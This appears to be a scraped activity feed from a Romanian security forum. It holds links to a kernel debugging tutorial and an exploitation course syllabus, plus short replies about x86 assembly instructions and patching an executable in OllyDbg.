  20. This is for someone who wants to jump into kernel debugging but like me thought it was very difficult to get setup and working properly. It turns out its actually a lot easier than you think. part1: https://vvalien1.wordpress.com/2016/12/26/kernel-debugging-101/ part2: https://vvalien1.wordpress.com/2017/01/01/kernel-debugging-101-part2/ part3: https://vvalien1.wordpress.com/2017/01/01/kernel-debugging-101-part3/
      • 3
      • Upvote
  21. Rezolvare:
  22. Video Preview Introduction Secure C 101 Secure C 102 Secure C 103 Code Auditing Linux & Permissions Spectrum Windows Overview Rootkits Reverse Engineering 101 Reverse Engineering 102 Fuzzing 101 Midterm Review Fuzzing 102 Exploitation 101 Exploitation 102 Exploitation 103 Networking 101 Networking 102 Web Exploitation 101 Web Exploitation 102 Web Exploitation 103 Exploitation 104 Exploitation 105 Exam 2 Review Exploitation 106 History of Exploitation Exploitation 107 Social Engineering & Physical Security Digital Forensics & Incident Response Tying All The Things Together http://howto.hackallthethings.com/2016/07/learning-exploitation-with-offensive.html
      • 4
      • Upvote
  23. Usr6

    [ASM] Noob

    nu e vinovat, el doar optimizeaza codul MrGrj zice: project properties -> build -> "optimize code" sau, daca tii neaparat, editezi fisierul executabil cu ollydbg si pui acolo mov edx, dword ptr[0x8CCE6C] in loc de: mov edx, plm.exe+4CCE6C
  24. Usr6

    [ASM] Noob

    mov edx, dword ptr[0x8CCE6C] iti incarca 4 byte din locatia respectiva, word daca iti trebuie 2 sau byte daca ai nevoie de primul byte sau push dword ptr [0x8CCE6C] pop edx
  25. Usr6

    [ASM] Noob

    ai incercat? jmp 0x8CCE6C sau push 0x8CCE6C jmp ebp
×
×
  • Create New...